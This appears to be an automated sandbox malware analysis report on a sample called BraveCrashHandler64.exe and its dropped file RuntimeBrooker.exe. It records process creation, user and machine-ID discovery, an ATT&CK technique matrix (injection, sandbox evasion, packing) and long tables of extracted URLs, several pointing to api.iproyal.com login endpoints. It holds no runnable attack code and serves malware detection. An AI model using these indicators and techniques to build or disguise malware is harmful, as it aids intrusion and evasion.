Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe

Code function: 7_2_00007FF4AF9A51F0 GetUserNameA,

7_2_00007FF4AF9A51F0

Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	1 Windows Management Instrumentation	1 Scripting	11 Process Injection	1 Masquerading	OS Credential Dumping	321 Security Software Discovery	Remote Services	Data from Local System	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	33 Virtualization/Sandbox Evasion	LSASS Memory	33 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	11 Process Injection	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Abuse Elevation Control Mechanism	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	1 Account Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	12 Software Packing	Cached Domain Credentials	1 System Owner/User Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	3 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
BraveCrashHandler64.exe	100%	Avira	ADWARE/Adware.Gen
BraveCrashHandler64.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	100%	Joe Sandbox ML

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
api.iproyal.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://crl.chambersign.org/chambersroot.crl0	0%	URL Reputation	safe
http://crl.chambersign.org/chambersroot.crl0	0%	URL Reputation	safe
http://crl.securetrust.com/SGCA.crl	0%	URL Reputation	safe
http://cps.chambersign.org/cps/chambersroot.html0	0%	URL Reputation	safe
http://crl.dhimyotis.com/certignarootca.crl0	0%	URL Reputation	safe
http://www.chambersign.org1	0%	URL Reputation	safe
http://crl.securetrust.com/SGCA.crl0	0%	URL Reputation	safe
http://crl.securetrust.com/STCA.crl0	0%	URL Reputation	safe
http://crl.dhimyotis.com/certignarootca.crl	0%	URL Reputation	safe
http://cps.chambersign.org/cps/chambersignroot.html0	0%	URL Reputation	safe
http://policy.camerfirma.com0	0%	URL Reputation	safe
http://crl.xrampsecurity.com/XGCA.crl	0%	URL Reputation	safe
https://wwww.certigna.fr/autorites/0m	0%	URL Reputation	safe
http://ocsp.accv.es0	0%	URL Reputation	safe
https://www.catcert.net/verarrel	0%	URL Reputation	safe
http://crl.securetrust.com/STCA.crl	0%	URL Reputation	safe
http://crl.xrampsecurity.com/XGCA.crlGo	0%	Avira URL Cloud	safe
http://crl.chambersign.org/chambersignroot.crl0	0%	URL Reputation	safe
http://crl.xrampsecurity.com/XGCA.crl0	0%	URL Reputation	safe
https://www.catcert.net/verarrel05	0%	URL Reputation	safe
http://crl.certigna.fr/certignarootca.crl01	0%	URL Reputation	safe
http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0	0%	Avira URL Cloud	safe
https://api.iproyal.com/v1/users/loginPSwCB0VWbAAlZBEwPQBeOA4tBxw9M1FYCQ==8	0%	Avira URL Cloud	safe
http://www.accv.es00	0%	URL Reputation	safe
https://api.iproyal.comt	0%	Avira URL Cloud	safe
http://crl.securetrust.com/SGCA.crl=	0%	Avira URL Cloud	safe
https://enigmaprotector.com/taggant/spv.crl0	0%	Avira URL Cloud	safe
https://api.iproyal.com1714047682worldIsShitty?api.iproyal.com:443tcpapi.iproyal.comws2_32.dllSystem	0%	Avira URL Cloud	safe
https://api.iproyal.com/https://api6.my-ip.io/ipidna:	0%	Avira URL Cloud	safe
https://enigmaprotector.com/taggant/user.crl0	0%	Avira URL Cloud	safe
https://api.iproyal.com/https://api6.my-ip.io/ipidna:	0%	Virustotal		Browse
https://api.iproyal.com/v1/users/loginPSwCB0VWbAAlZBEwPQBeOA4tBxw9M1FYCQ==kqGk19	0%	Avira URL Cloud	safe
http://crl.xrampsecurity.com/XGCA.crlGo	0%	Virustotal		Browse
https://api.iproyal.com/v1/users/loginPSwCB0VWbAAlZBEwPQBeOA4tBxw9M1FYCQ==ExesL3jCExiRYi82g3ylkSM5T1	0%	Avira URL Cloud	safe
https://api.iproyal.com1714053689worldIsShitty?api.iproyal.com:443tcpapi.iproyal.comws2_32.dllSystem	0%	Avira URL Cloud	safe
http://crl.certigna.fr/certignarootca.crl	0%	Avira URL Cloud	safe
https://api.iproyal.com1714047672worldIsShitty?api.iproyal.com:443tcpapi.iproyal.comws2_32.dllSystem	0%	Avira URL Cloud	safe
https://enigmaprotector.com/taggant/spv.crl0	1%	Virustotal		Browse
http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0	0%	Virustotal		Browse
https://api.iproyal.com/v1/users/login	0%	Avira URL Cloud	safe
https://api.iproyal.com1714047675worldIsShitty?api.iproyal.com:443tcpapi.iproyal.comws2_32.dllCommon	0%	Avira URL Cloud	safe
http://crl.securetrust.com/SGCA.crl=	0%	Virustotal		Browse
https://api.iproyal.com1714047687worldIsShitty?api.iproyal.com:443tcpapi.iproyal.comws2_32.dllSystem	0%	Avira URL Cloud	safe
https://enigmaprotector.com/taggant/user.crl0	0%	Virustotal		Browse
https://api.iproyal.comCommonProgramFiles=C:	0%	Avira URL Cloud	safe
https://api.iproyal.com/v1/users/loginPSwCB0VWbAAlZBEwPQBeOA4tBxw9M1FYCQ==AfWgpX0XnpfyEMMJtmlM3HjxKy	0%	Avira URL Cloud	safe
https://api.iproyal.com1714047679worldIsShitty?api.iproyal.com:443tcpapi.iproyal.comws2_32.dllSystem	0%	Avira URL Cloud	safe
http://crl.certigna.fr/certignarootca.crl	0%	Virustotal		Browse
https://api.iproyal.com/v1/users/loginPost	0%	Avira URL Cloud	safe
https://api.iproyal.com/v1/users/loginPSwCB0VWbAAlZBEwPQBeOA4tBxw9M1FYCQ==7m9fHZvLPTY2pWRLrSiq0MGQOl	0%	Avira URL Cloud	safe
http://crl.certigna.fr/certignarootca.crlhttp://crl.dhimyotis.com/certignarootca.crl	0%	Avira URL Cloud	safe
http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl	0%	Avira URL Cloud	safe
https://api.iproyal.com/v1/users/login	0%	Virustotal		Browse
http://ocsp.accv.esTWCA	0%	Avira URL Cloud	safe
https://api.iproyal.com	0%	Avira URL Cloud	safe
https://api.iproyal.com1714053685worldIsShitty?api.iproyal.com:443tcpapi.iproyal.comws2_32.dllSystem	0%	Avira URL Cloud	safe
http://crl.certigna.fr/certignarootca.crlhttp://crl.dhimyotis.com/certignarootca.crl	0%	Virustotal		Browse
https://api.iproyal.com	0%	Virustotal		Browse
http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.iproyal.com	193.228.196.69	true	false	0%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.iproyal.comt	RuntimeBrooker.exe, 0000000E.00000002.1396266752.000000C0000A2000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0	RuntimeBrooker.exe, 00000007.00000002.1326472681.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1359600597.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393382195.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1424970733.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1484099103.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524094265.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://crl.chambersign.org/chambersroot.crl0	RuntimeBrooker.exe, 00000007.00000002.1326472681.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1359600597.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393382195.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1424970733.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1484099103.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524094265.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://api.iproyal.com/v1/users/loginPSwCB0VWbAAlZBEwPQBeOA4tBxw9M1FYCQ==8	RuntimeBrooker.exe, 0000001A.00000002.1527603413.000000C000240000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.securetrust.com/SGCA.crl	RuntimeBrooker.exe, 00000007.00000002.1330810409.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1362399139.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1396266752.000000C000090000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000011.00000002.1428365569.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000015.00000002.1491215219.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1527042507.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1561994832.000000C00000E000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.xrampsecurity.com/XGCA.crlGo	RuntimeBrooker.exe, 00000007.00000002.1330810409.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1362399139.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1396266752.000000C000090000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000011.00000002.1428365569.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000015.00000002.1491215219.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1527042507.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1561994832.000000C00000E000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://cps.chambersign.org/cps/chambersroot.html0	RuntimeBrooker.exe, 00000007.00000002.1326472681.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1359600597.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393382195.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1424970733.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1484099103.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524094265.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp	false	URL Reputation: safe	unknown
http://crl.dhimyotis.com/certignarootca.crl0	RuntimeBrooker.exe, 00000007.00000002.1326472681.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1359600597.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393382195.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1424970733.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1484099103.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524094265.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/soap/envelope/	RuntimeBrooker.exe, 0000001A.00000002.1523871329.00000000007E9000.00000002.00000001.01000000.00000007.sdmp	false		high
http://www.chambersign.org1	RuntimeBrooker.exe, 0000001A.00000002.1524094265.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp	false	URL Reputation: safe	unknown
http://www.firmaprofesional.com/cps0	RuntimeBrooker.exe, 00000007.00000002.1326472681.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1359600597.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393382195.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1424970733.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1484099103.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524094265.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp	false		high
http://repository.swisssign.com/0	RuntimeBrooker.exe, 00000007.00000002.1326472681.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1359600597.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393382195.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1424970733.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1484099103.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524094265.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp	false		high
http://crl.securetrust.com/SGCA.crl=	RuntimeBrooker.exe, 00000007.00000002.1330810409.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1362399139.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1396266752.000000C000090000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000011.00000002.1428365569.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000015.00000002.1491215219.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1527042507.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1561994832.000000C00000E000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://enigmaprotector.com/taggant/spv.crl0	RuntimeBrooker.exe, 00000007.00000000.1308218803.0000000002BA2000.00000080.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000002B9D000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000002B9D000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000000.1340333174.0000000002BA2000.00000080.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000000.1373941660.0000000002BA2000.00000080.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000002B9D000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000000.1405591014.0000000002BA2000.00000080.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000002B9D000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000002B9D000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000000.1457409512.0000000002BA2000.00000080.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000002B9D000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000000.1504929919.0000000002BA2000.00000080.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000000.1539068961.0000000002BA2000.00000080.00000001.01000000.00000007.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://crl.securetrust.com/SGCA.crl0	RuntimeBrooker.exe, 00000007.00000002.1326472681.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1359600597.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393382195.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1424970733.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1484099103.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524094265.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp	false	URL Reputation: safe	unknown
https://api.iproyal.com1714047682worldIsShitty?api.iproyal.com:443tcpapi.iproyal.comws2_32.dllSystem	RuntimeBrooker.exe, 00000011.00000002.1428365569.000000C00000E000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.iproyal.com/https://api6.my-ip.io/ipidna:	RuntimeBrooker.exe, 00000007.00000002.1326236620.00000000007E9000.00000002.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1359302875.00000000007E9000.00000002.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393176430.00000000007E9000.00000002.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1424722305.00000000007E9000.00000002.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1482658369.00000000007E9000.00000002.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1523871329.00000000007E9000.00000002.00000001.01000000.00000007.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://crl.securetrust.com/STCA.crl0	RuntimeBrooker.exe, 00000007.00000002.1326472681.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1359600597.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393382195.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1424970733.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1484099103.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524094265.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp	false	URL Reputation: safe	unknown
https://enigmaprotector.com/taggant/user.crl0	RuntimeBrooker.exe, 00000007.00000000.1308218803.0000000002BA2000.00000080.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000002B9D000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000002B9D000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000000.1340333174.0000000002BA2000.00000080.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000000.1373941660.0000000002BA2000.00000080.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000002B9D000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000000.1405591014.0000000002BA2000.00000080.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000002B9D000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000002B9D000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000000.1457409512.0000000002BA2000.00000080.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000002B9D000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000000.1504929919.0000000002BA2000.00000080.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000000.1539068961.0000000002BA2000.00000080.00000001.01000000.00000007.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.iproyal.com/v1/users/loginPSwCB0VWbAAlZBEwPQBeOA4tBxw9M1FYCQ==kqGk19	RuntimeBrooker.exe, 00000015.00000002.1492035852.000000C000240000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.quovadisglobal.com/cps0	RuntimeBrooker.exe, 00000007.00000002.1326472681.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1359600597.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393382195.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1424970733.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1484099103.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524094265.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp	false		high
http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl	RuntimeBrooker.exe, 00000007.00000002.1331226063.000000C000180000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1362399139.000000C000100000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1397301998.000000C0001B8000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000011.00000002.1429024893.000000C000180000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000015.00000002.1492035852.000000C000180000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1527603413.000000C000180000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0	RuntimeBrooker.exe, 00000007.00000002.1326472681.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1359600597.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393382195.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1424970733.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1484099103.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524094265.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp	false		high
https://api.iproyal.com/v1/users/loginPSwCB0VWbAAlZBEwPQBeOA4tBxw9M1FYCQ==ExesL3jCExiRYi82g3ylkSM5T1	RuntimeBrooker.exe, 00000011.00000002.1429024893.000000C000240000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.dhimyotis.com/certignarootca.crl	RuntimeBrooker.exe, 00000007.00000002.1331226063.000000C0001BE000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1362399139.000000C00013E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1397301998.000000C0001F8000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000011.00000002.1429024893.000000C0001BE000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000015.00000002.1492035852.000000C0001BE000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1527603413.000000C0001BE000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ocsp.accv.es	RuntimeBrooker.exe, 00000007.00000002.1330810409.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1362399139.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1396266752.000000C0000A2000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000011.00000002.1428365569.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000015.00000002.1491215219.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1527042507.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1561994832.000000C00000E000.00000004.00001000.00020000.00000000.sdmp	false		high
https://api.iproyal.com1714053689worldIsShitty?api.iproyal.com:443tcpapi.iproyal.comws2_32.dllSystem	RuntimeBrooker.exe, 0000001D.00000002.1561994832.000000C00000E000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cps.chambersign.org/cps/chambersignroot.html0	RuntimeBrooker.exe, 00000007.00000002.1326472681.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1359600597.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393382195.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1424970733.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1484099103.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524094265.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp	false	URL Reputation: safe	unknown
